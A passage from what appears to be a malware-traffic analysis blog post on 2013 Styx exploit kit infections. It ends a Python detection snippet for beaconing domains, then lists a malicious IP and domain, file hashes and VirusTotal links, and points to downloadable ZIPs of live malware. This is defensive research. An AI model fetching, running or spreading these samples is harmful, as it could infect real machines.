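    for suffix, hosts in sorted(callback_report(SAMPLE_RECORDS).items()):
        print('%-12s %d handshake(s): %s' % (suffix, len(hosts), ', '.join(hosts)))
```

Feed it the first TCP payload of each port 443 flow from the PCAP and the report shows which suffixes carry the traffic; a domain that never appears as a normal browsing destination but shows up with a different random prefix on every connection is the pattern worth a block rule, and it holds up even after the bot's certificate details change.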
ADDITIONAL NOTES ON THE INFECTION TRAFFIC
As noted earlier, other exploits (Java-based) were sent, and the same malicious EXE was downloaded again. In the image below, I've highlighted the events that I didn't review in this blog entry:
Feel free to review the PCAP for more details on the extra infection traffic.
The malicious EXE appears to be some variation on Kazy or Kryptik, which is a Trojan downloader. However, I didn't notice any follow-up downloads on the Windows VM, so I executed the malicious EXE in the AppData\Local\Temp folder on a physical Windows machine. That returned another piece of malware, which I've included in the preliminary malware analysis below.
PRELIMINARY MALWARE ANALYSIS
EOT exploit from 185.31.209.83 port 80 (diq.endpointcash.asia):
https://www.virustotal.com/en/file/c9768dd18be40e8cc14e9a6c7eb0dad36c4dd600acbab5903970f2d3865a8347/analysis/
File name: cfb7461af2c378522efb4796ec2a96b8.eot
File size: 4.2 KB ( 4331 bytes )
MD5 hash: cfb7461af2c378522efb4796ec2a96b8
Detection ratio: 4 / 47
First submitted: 2013-11-24 04:37:18 GMT (by me)
Malicious EXE from 185.31.209.83 port 80 (diq.endpointcash.asia):
https://www.virustotal.com/en/file/c9768dd18be40e8cc14e9a6c7eb0dad36c4dd600acbab5903970f2d3865a8347/analysis/
File name: 28452bd26e2145c12f6b24b36ca37d98.exe
File size: 320.0 KB ( 327680 bytes )
MD5 hash: 28452bd26e2145c12f6b24b36ca37d98
Detection ratio: 10 / 47
First submitted: 2013-11-23 07:31:53 GMT (by me)
Second malicious EXE downloaded by the first EXE on 2013-11-23:
https://www.virustotal.com/en/file/2c88599470a2151739c3811d82caaeb6fd92785d99df47d571f34afaaf6145ee/analysis/
File name: 2f354eb035e12d467d8229858d381328.exe
File size: 456.0 KB ( 466976 bytes )
MD5 hash: 2f354eb035e12d467d8229858d381328
Detection ratio: 4 / 47
First submitted: 2013-11-24 00:40:34 GMT (by me)
I also took the Java archives I saw in the VM's AppData\Local\Temp folder and submitted them to VirusTotal.
- MD5: a1b81bc04f8bacd03c1bda59ceb2290f - Size: 11,299 bytes - VirusTotal link
- MD5: 901769baa0480718ee8a97e66ee678b4 - Size: 11,299 bytes - VirusTotal link
- MD5: 844dbb812117cffc0b845ff6d66f35b1 - Size: 11,302 bytes - VirusTotal link
- MD5: 3af8065d3c46e44dee05dfc42f1ecfc9 - Size: 16,427 bytes - VirusTotal link
- MD5: 063a2e4f7061c07bd24c6e85b1d441f5 - Size: 16,428 bytes - VirusTotal link
Archive contents of the first Java exploit (the one at 11 KB or so):
Archive contents of the second Java exploit (the one at 16 KB or so):
FINAL NOTES
Once again, here are the associated files:
- ZIP of the PCAP: 2013-11-23-Styx-EK-traffic.pcap.zip
- ZIP file of the malware: 2013-11-23-Styx-EK-malware.zip
ZIP files are password-protected with the standard password. If you don't know it, look at the "about" page of this website.